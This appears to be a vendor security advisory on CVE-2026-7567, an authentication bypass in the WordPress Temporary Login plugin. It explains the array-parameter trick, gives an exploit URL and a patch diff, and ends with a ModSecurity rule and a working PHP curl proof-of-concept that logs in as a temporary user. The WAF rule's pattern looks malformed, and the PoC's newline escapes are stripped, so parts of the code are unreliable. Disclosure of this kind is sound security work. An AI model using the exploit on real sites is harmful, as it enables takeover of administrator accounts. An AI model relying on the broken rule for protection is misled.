Atomic Edge analysis of CVE-2026-7567: This is an authentication bypass vulnerability in the Temporary Login plugin for WordPress, affecting versions up to and including 1.0.0. The plugin fails to properly validate the ‘temp-login-token’ GET parameter before processing it in the maybe_login_temporary_user() function. An attacker can supply this parameter as an array, bypassing PHP’s empty() check and causing sanitize_key() to return an empty string, which then retrieves all active temporary users without a valid token. The CVSS score is 9.8 (Critical).
Root Cause: The vulnerability originates in the maybe_login_temporary_user() function located in temporary-login/core/admin.php at line 134. The function calls sanitize_key( $_GET[‘temp-login-token’] ) without first verifying that the parameter is a scalar string. When an attacker supplies ‘temp-login-token’ as an array (e.g., temp-login-token[]=value), PHP’s empty() check on line 133 fails because an array with one element is not empty. sanitize_key() then returns an empty string for array input. This empty string is passed as the $meta_value to get_users() in Options::get_user_by_token() via Options.php line 60-62, where WordPress ignores an empty meta_value and returns all users matching the meta_key ‘_temporary_login_token’. The get_user_by_token() method does not enforce that the token is non-empty before querying.
Exploitation: An unauthenticated attacker can bypass authentication by sending a single crafted GET request to any WordPress page that triggers the plugin’s authentication hook. The exploit requires the attacker to supply ‘temp-login-token’ as an array parameter. For example: http://target.com/?temp-login-token[]=random. The plugin processes this malformed parameter, retrieves the first matching temporary user from the database, and logs the attacker in as that user. The attacker does not need any prior knowledge of valid tokens. The attack works on any URL where WordPress processes GET parameters, typically the home page or login page.
Patch Analysis: The patch in version 1.1.0 adds multiple defensive layers. First, it introduces a site token validation mechanism. In admin.php lines 133-138, the plugin now checks if a ‘tl-site’ GET parameter matches the stored site token before proceeding with authentication. This site token is generated randomly on plugin activation (Options.php line 71-74) and appended to login URLs (Options.php line 102-107). The token is deleted when all temporary users are removed (Options.php line 186). Additionally, the generate_token() function now accepts a length parameter, and the site token uses a shorter 8-byte random value. The patch does not fix the underlying array parameter bypass directly, but instead adds a second factor (site token) that an attacker cannot predict, preventing the bypass.
Impact: Successful exploitation allows an unauthenticated attacker to gain authenticated access to any active temporary user account. These accounts typically have elevated privileges, potentially including administrator access. An attacker can then perform any action the compromised user can, including reading sensitive data, modifying content, installing plugins, or creating new administrative accounts. The attack requires no prior authentication and can be executed against any website running the vulnerable plugin version. The full CVSS score of 9.8 reflects the critical severity due to the low complexity and network-based attack vector.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/temporary-login/assets/admin.asset.php
+++ b/temporary-login/assets/admin.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'wp-components', 'wp-dom-ready', 'wp-element', 'wp-i18n'), 'version' => 'f1225bbc738e8f4d25d5');
+<?php return array('dependencies' => array('react', 'wp-components', 'wp-dom-ready', 'wp-element', 'wp-i18n'), 'version' => 'f6a02a7bcb72cda9f414');
--- a/temporary-login/core/admin.php
+++ b/temporary-login/core/admin.php
@@ -131,9 +131,16 @@
$token = sanitize_key( $_GET['temp-login-token'] );
+ $is_site_token_validated = true;
+
+ $site_token = Options::get_site_token();
+ if ( ! empty( $site_token ) ) {
+ $is_site_token_validated = ! empty( $_GET['tl-site'] ) && $site_token === $_GET['tl-site'];
+ }
+
$user = Options::get_user_by_token( $token );
- if ( ! $user || Options::is_user_expired( $user->ID ) ) {
+ if ( ! $user || ! $is_site_token_validated || Options::is_user_expired( $user->ID ) ) {
wp_safe_redirect( home_url() );
die;
}
--- a/temporary-login/core/options.php
+++ b/temporary-login/core/options.php
@@ -53,6 +53,10 @@
update_user_meta( $user_id, $meta_key, $meta_value );
}
+ if ( ! static::get_site_token() ) {
+ static::create_site_token();
+ }
+
return $user_id;
}
@@ -60,8 +64,22 @@
return current_time( 'timestamp' ) + WEEK_IN_SECONDS;
}
- private static function generate_token(): string {
- return bin2hex( random_bytes( 32 ) );
+ private static function generate_token( $length = 32 ): string {
+ return bin2hex( random_bytes( $length ) );
+ }
+
+ public static function get_site_token() {
+ return get_option( '_temporary_login_site_token' );
+ }
+
+ private static function create_site_token(): void {
+ $site_token = static::generate_token( 8 );
+
+ update_option( '_temporary_login_site_token', $site_token );
+ }
+
+ private static function delete_site_token(): void {
+ delete_option( '_temporary_login_site_token' );
}
public static function is_temporary_user( $user_ID ) : bool {
@@ -75,9 +93,18 @@
return '';
}
- return add_query_arg( [
+ $login_url = add_query_arg( [
'temp-login-token' => $token,
], admin_url() );
+
+ $site_token = static::get_site_token();
+ if ( ! empty( $site_token ) ) {
+ $login_url = add_query_arg( [
+ 'tl-site' => $site_token,
+ ], $login_url );
+ }
+
+ return $login_url;
}
public static function get_expiration_human( $user_ID ): string {
@@ -154,6 +181,8 @@
foreach ( $temporary_users as $user ) {
wp_delete_user( $user->ID );
}
+
+ static::delete_site_token();
}
public static function remove_expired_temporary_users() {
--- a/temporary-login/temporary-login.php
+++ b/temporary-login/temporary-login.php
@@ -4,7 +4,8 @@
* Description: Create simple, no password user access with a single click.
* Plugin URI: https://elementor.com/
* Author: Elementor.com
- * Version: 1.0.0
+ * Author URI: https://elementor.com/?utm_source=wp-plugins&utm_campaign=temp-login&utm_medium=wp-dash
+ * Version: 1.1.0
* License: GPL-3
* License URI: https://www.gnu.org/licenses/gpl-3.0.en.html
*
@@ -15,7 +16,7 @@
exit; // Exit if accessed directly.
}
-define( 'TEMPORARY_LOGIN_VERSION', '1.0.0' );
+define( 'TEMPORARY_LOGIN_VERSION', '1.1.0' );
define( 'TEMPORARY_LOGIN__FILE__', __FILE__ );
define( 'TEMPORARY_LOGIN_PLUGIN_BASE', plugin_basename( TEMPORARY_LOGIN__FILE__ ) );
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-7567
# Blocks array parameter injection for temp-login-token on any WordPress page
SecRule REQUEST_URI "@rx ^/?(?:index.php|wp-login.php|wp-admin)?$"
"id:20267567,phase:2,deny,status:403,chain,msg:'CVE-2026-7567 Temporary Login Authentication Bypass via array parameter',severity:'CRITICAL',tag:'CVE-2026-7567'"
SecRule ARGS_GET_NAMES "@streq temp-login-token" "chain"
SecRule ARGS_GET:temp-login-token "@rx ^[]|..$" "t:none"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-7567 - Temporary Login <= 1.0.0 Authentication Bypass to Account Takeover
$target_url = 'http://example.com'; // Change this to the target WordPress URL
// Step 1: Send a request with temp-login-token as an array to bypass authentication
$exploit_url = $target_url . '/?temp-login-token[]=anything'; // Array parameter bypasses empty() check
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // Follow redirects to see where we end up
curl_setopt($ch, CURLOPT_HEADER, true); // Include response headers
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/temp_cookies.txt'); // Store cookies for authenticated session
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$final_url = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
curl_close($ch);
// Step 2: Check if we were redirected to wp-admin (successful login) or home page (failed)
if (strpos($final_url, 'wp-admin') !== false) {
echo "[+] Authentication bypass successful! Logged in as a temporary user.n";
echo "[+] Final URL: $final_urln";
// Step 3: Demonstrate access by fetching wp-admin dashboard or creating a new admin
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/temp_cookies.txt');
$dashboard = curl_exec($ch);
curl_close($ch);
if (strpos($dashboard, 'Dashboard') !== false) {
echo "[+] Successfully accessed WordPress dashboard.n";
}
} else {
echo "[-] Exploit failed. Target may be patched or no temporary users exist.n";
}
// Clean up
unlink('/tmp/temp_cookies.txt');
